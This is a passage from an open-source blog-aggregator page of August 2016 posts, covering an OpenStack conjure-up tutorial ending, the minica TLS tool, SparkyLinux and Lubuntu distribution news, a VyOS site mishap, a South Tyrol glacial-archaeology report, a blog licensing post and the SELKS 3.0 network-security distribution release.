launch a browser and give it a go using the ip http://<ip_address>/horizon

 

Default username = admin

Default password = openstack

If you want to see al lthe containers running on your machine run:

$ lxc list

this should give you output along the lines of:

conjure-up1-3

Each line represents a container running in a container. If you want to access any of the containers to poke around you can run:

$ lxc exec <service name as given in the first column> bash

for example:

$ lxc exec juju-9cb02c-9 bash

In the next installment we’ll show you how to deploy workloads into your newly running cloud. In the mean time have fun!

15 August, 2016 09:00AM

Paul Tagliamonte: Minica - lightweight TLS for everyone!

A while back, I found myself in need of some TLS certificates set up and issued for a testing environment.

I remembered there was some code for issuing TLS certs in Docker, so I yanked some of that code and made a sensable CLI API over it.

Thus was born minica!

Something as simple as minica tag@domain.tls domain.tld will issue two TLS certs (one with a Client EKU, and one server) issued from a single CA.

Next time you’re in need of a few TLS keys (without having to worry about stuff like revocation or anything), this might be the quickest way out!

15 August, 2016 12:40AM

August 14, 2016

hackergotchi for SparkyLinux

SparkyLinux

Sparky news 08/2016

 

A few lines should let you know what is going on inside Sparky.

If everything goes fine, new live/install iso images of Sparky 4.4 should be ready on the end of the next week.

The ‘Calameres’ installer is available in our repository, but is not configured to install the system on UEFI machines yet.

An issue in the ‘live-installer’ has been fixed so it is still our default installer, as well as the Advanced Installer is provided as a backup to the main one.

The ‘Advanced Installer’ used on Sparky MinimalGUI or MinimalCLI iso image lets you install one of the 22 desktop environments/window managers now (awesome, bspwm, Budgie, Cinnamon, Enlightenment, Fluxbox, GNOME Flashback, GNOME Shell, i3, IceWM, JWM, KDE Plasma 5, Lumina, LXDE, LXQt, MATE, Openbox, Pantheon, PekWM, Trinity, Window Maker, Xfce) and one of a web browser (Chromium, Dillo, Epiphany, Firefox, Konqueror, Midori, NetSurf, QupZilla, SeaMonkey, TOR Browser, Vivaldi).

Vivaldi web browser has been added to Sparky repos (can be installed via APT, Synaptic or Sparky APTus Extra).
A lightweight NetSurf web browser has been moved from Debian Sid repos to ours.
BlueGriffon – a WYSIWYG content editor for the World Wide Web has been upgraded up to the latest version 2.2.1.
The latest stable version of Firefox landed in Sparky repos.

The ‘sparky-backup-core’ package has been split into two packages: ‘sparky-backup-core’ and ‘sparky-backup-desktop’. It lets the Advanced Installer upgrade desktops number and settings (itself) to be installed via the Minimal iso image.

Sparky Office tool lets you install an Office suite and a PDF (and other documents) viewer now.

Sparky Wiki has been improved, adding new pages.

Feel free to ask a question or leave your feedback on our forums, or just send out donation to keep Sparky alive.

 

14 August, 2016 12:44PM by pavroo

August 13, 2016

hackergotchi for VyOS

VyOS

dead.vyos.net and contributing to VyOS

Hi everyone,

This is a bit embarassing. For almost a day http://www.vyos.net (but not http://vyos.net) was sending people to the http://dead.vyos.net website, until someone on the IRC pointed it out (thanks for this!).

It happened due to an oddity in the way Apache HTTPD handles host aliases, and it's fixed now.

The dead.vyos.net website was created as a joke for giving the link to people who ask if VyOS project is dead. While the website is indeed a joke, the issue with lack of contributors is very real, and it does slow things down.

If you want to contribute to VyOS, there is a lot of work to be done, and the maintainers on the IRC and in phabricator will be happy to point you to beginner-friendly tasks and answer questions about the code and the patch submission process.


13 August, 2016 09:17PM

hackergotchi for Ubuntu developers

Ubuntu developers

Simon Quigley: A look at Lubuntu's LXQt Transition

This blog post is not an announcement of any kind or even an official plan. This may even be outdated, so check the links I provide for additional info.

As you may have seen, the Lubuntu team (which I am a part of) has started the migration process to LXQt. It's going to be a long process, but I thought I might write about some of the things that goes into this process.

Step 1 - Getting a metapackage

This step is already done, and it's installable last time I checked in a Virtual Machine. The metapackage is lubuntu-qt-desktop, but there's a lot to be desired.

While we already have this package, there's a lot to be tweaked. I've been running LXQt with the Lubuntu artwork as my daily driver for a few months now, and there's a lot missing that needs to be tweaked. So while you have the ability to install the package and play around with it, it needs to be a lot different to be usable.

Also in this image are our candidates (not final yet) for applications that will be included in Lubuntu. Here's a current list of what's on the image:

An up-to-date listing of the software in this metapackage is available here.

Step 2 - Getting an image

The next step is getting a working image for the team to test. The two outstanding merge proposals adding this have been merged, and we're now waiting for the images to be spun up and added to the ISO QA Tracker for testers.

Having this image will help us gauge how much system resources are used, and gives us the ability to run some benchmarks on the desktop. This will come after the image is ready and spins up correctly.

Step 3 - Testing

An essential part of any good operating system is the testing. We need to create some LXQt-specific test cases and make sure the ISO QA test cases are working before we can release a reliable image to our users.

As mentioned before, we need test cases. We created a blueprint last cycle tracking our progress with test cases, and the sooner that those are done, the sooner Lubuntu can make the switch knowing that all of our selected applications work fine.

Step 4 - Picking applications

This is the tough step in all of this. We need to pick the applications that best suit our users' use cases (a lot of our users run on older hardware) and needs (LibreOffice for example). Every application will most likely need a week or two to do proper benchmarking and testing, but if you have a suggestion for an application that you would like to see in Lubuntu, share your feedback on the blueprints. This is the best way to let us know what you would like to see and your feedback on the existing applications before we make a final decision.

Final thoughts

I've been using LXQt for a while now, and it has a lot of advantages not only in applications, but the desktop itself. Depending on how notable some things are, I might do a blog post in the future, otherwise, see for yourself. :)

Here is our blueprint that will be updated a lot in the next week or so that will tell you more about the transition. If you have any questions, shoot me an email at tsimonq2@lubuntu.me or send an email to the Lubuntu-devel mailing list.

I'm really excited for this transition, and I hope you are too.

13 August, 2016 06:18PM by Simon Quigley (tsimonq2@ubuntu.com)

hackergotchi for ArcheOS

ArcheOS

Glacial Finds from the Langgrubenjoch (Gde. Mals and Gde. Schnals) in South Tyrol. Preliminary Report


We've published a preliminary report in german language about our project on Langgrubenjoch (South-Tyrol) in the german journal Archäologisches Korrespondenzblatt.
It has a profile as a topical scientific journal on issues of Prehistoric, Roman and Medieval archaeology and related sciences in Europe. Beside topical debates the journal provides a place for the publication of new finds and short analysis of general interest. (Definition by RGZM)
Bringing home the finds

Finds from thawing névés and ice fields were discovered at the Langgrubenjoch (3017 m a. s. l.) between Matscher- and Schnalstal in the southern Ötztal Alps. The finds are predominantly made up of wooden parts, many of which are fragments of boards and show tool marks. 
GPS
First radiocarbon and dendro dates reveal artefacts dating back to the Copper Period, middle to late Bronze Age as well as the Roman period. The toolmarks and comparable finds suggest that the pieces of boards consisting of larch (Larix decidua) were the remains of the roof shingles of a late Bronze Age hut. 
Parallel documentation with Geopaparazzi
Although the Langgrubenjoch cannot be crossed easily it is the shortest route between the Obere Vinschgau in the area of Mals and Schnalstal and the region north of the alpine main ridge. The periods of time indicated by the finds, i. e. the late 3 rd and 2 nd millennia BC as well as the Rom an period, witnessed a relatively low extent of the glaciers or warm phases.

Documentation
In those times the Langgrubenjoch was possibly easier accessible and therefore used more intensively.

Glacial Finds from the Langgrubenjoch (Gde. Mals and Gde. Schnals) in South Tyrol. Preliminary Report

Authors:
Alessandro Bezzi, Giuseppe Naponiello, Rupert Gietl (Arc-Team)
Hubert Steiner (Cult. Heritage Dep. of South-Tyrol)
Kurt Nicolussi, Thomas Pichler (Uni Innsbruck)

Archäologisches Korrespondenzblatt 46 (2016) 167-182.

Related postings & videos:

13 August, 2016 11:36AM by Rupert Gietl (noreply@blogger.com)

August 12, 2016

hackergotchi for Ubuntu developers

Ubuntu developers

Jono Bacon: My Blog is Creative Commons Licensed

Earlier this week I was asked this on Twitter:

Screenshot from 2016-08-12 22-50-26

An entirely reasonable question given that I had entirely failed to provide clarity on how my content is licensed on each page. So, thanks, Elio, for helping me to fix this. You will now see a licensing blurb at the bottom of each post as well as a licensing drop-down item in the menu.

To clarify, all content on my blog is licensed under the Creative Commons Attribution Share-Alike license. I have been a long-time free culture and Creative Commons fan, supporter, and artist (see my archive of music, podcasts, and more here), so this license is a natural choice.

Let’s now explore what you can do with my content under the parameters of this license.

What You Can Do

The license is pretty simple. You are allowed to:

  • Share – feel free to share my blog posts with whoever you want.
  • Remix – you are welcome to use my posts and create derived works from them.

…there is a requirement though. You are required to provide attribution for my content. I don’t need a glowing missive about how the article changed your life, just a few words that reference me as the author and point to the original article, that’s all. Something like:

‘My Blog is Creative Commons Licensed’ originally written by Jono Bacon and originally published at http://www.jonobacon.org/2016/08/12/my-blog-is-creative-commons-licensed/

will be great. Thanks!

To learn more about your rights with my content, so the license details.

What I Would Love You Do

So, that’s what you are allowed to do, but what would I selfishly love you to do with my content?

Well, a bunch of things:

  • Share it – I try to write things on this blog that are helpful to others, but it is only helpful if people read it. So, your help sharing and submitting my posts on and to social media, news sites, other blogs, and elsewhere is super helpful.
  • Include and reference it in other work – I always love to see my work included and referenced in other blog posts, books, research papers, and elsewhere. If you find something useful in my writing, feel free to go ahead and use it.
  • Translate it – I would love to see my posts translated into different languages, just like Elio offered to do. If you do make a translation, let me know so I can add a link to it in the original article.

Of course, if you have any other questions, don’t hesitate to get in touch and whether you just read my content or choose to share, derive, or translate it, thanks for being a part of it! 🙂

The post My Blog is Creative Commons Licensed appeared first on Jono Bacon.

12 August, 2016 02:59PM

hackergotchi for Stamus Networks

Stamus Networks

The third SELKS is out

Yes, we did it: the most awaited SELKS 3.0 is out. This is the first stable release of this new branch that brings you the latest Suricata and Elastic stack technology.

SELKS is both Live and installable Network Security Management ISO based on Debian implementing and focusing on a complete and ready to use Suricata IDS/IPS ecosystem with its own graphic rule manager. Stamus Networks is a proud member of the Open Source community and SELKS is released under GPLv3 license.

Suricata page in Scirius

Suricata page in Scirius

Main changes and new features

Suricata 3.1.1

SELKS 3.0 comes with latest Suricata namely 3.1.1 bringing a big performance boost as well as some new IDS and NSM capabilities.

Elasticsearch 2.x and Kibana 4

But the main change in SELKS 3.0 is the switch to the latest generation of the Elastic stack. On user side this means Kibana 3 has been replaced by Kibana 4. And this really means a lot. Kibana 4 is a complete rewrite of Kibana 3 being non backward compatible on data side. So, our team had to redo from scratch all dashboards and visualizations. The result is a new set of 11 ready-to-use dashboards and a lots of visualizations that you can use to build your own dashboards.

Kibana Alert dashboard

Kibana Alert dashboard

correlate-alerts

Complete flow and rule correlation view of an alert

Latest Scirius Community Edition

On the ruleset management side, SELKS 3.0 comes with Scirius Community Edition 1.1.10 that has support for advanced Suricata feature like xbits.

Thresholding

Suppression with Scirius

Thresholding-1

Threshold and suppress ruleset view with Scirius

Thresholding-2

Thresholding with Scirius

Scirius CE also brings thresholding and suppression support as well as an integrated backup system which allows for back up to be done (besides locally) in locations such as :

  • FTP
  • Amazon AWS
  • Dropbox
Evebox

SELKS 3.0 comes with Evebox an alert management/viewer/report interface for Suricata that presents events as a mailbox to provide classification via acknowledgement and escalade.

Mailbox view in Evebox

Mailbox view in Evebox

One of the other interesting features of Evebox is the capability to create and export pcap generated from events:

Pcap-1

Payload pcap generation (Evebox)

Pcap-2

Payload pcap generation (Evebox)

Features list

  • Suricata IDS/IPS/NSM  – Suricata 3.1.1 packaged.
  • Elasticsearch 2.3.5  – latest available ES edition featuring speed, scalability, security improvements and more.
  • Logstash 2.3.4 – performance improvement ES 2.3 compatability, dynamically reload pipelines on the fly and more
  • Kibana 4.5.4 – taking advantage of the latest features and performance improvement of ES
  • Scirius 1.1.10 – support for xbits, hostbits, thresholding, suppression, backup and more
  • Evebox – alert management/viewer/report interface for Suricata/ES  allowing easy export of payload/packets into pcaps
  • 4.4.x longterm kernel – SELKS 3.0 comes by default with 4.4.16 kernel.
  • Dashboards – reworked dashboards with flow and rule correlation capability.

SELKS comes with 11 ready to use Kibana dashboards. More than 190 visualizations are available to mix, match, customize and make your own dashboards as well.

Please feel free to try it out, spread the word, feedback and let’s talk about SELKS 3.0.

To get you started

Once downloaded and installed, you can get access to all components via https://your.selks.IP.here/

The default user and password for both web interface and system is:

  • user: selks-user
  • password: selks-user

The default root password is StamusNetworks.

Please note that in Live mode the password for the selks-user system user is live.

Upgrades

There is no direct upgrade path from SELKS 2.0 to SELKS 3.0 due to a number of breaking and compatibility changes in Elasticsearch 1.x to 2.x and Kibana 3.x to 4.x. The only proposed upgrade path is SELKS 3.0RC1 upgrade to SELKS 3.0

More about SELKS 3.0

12 August, 2016 08:29AM by Peter Manev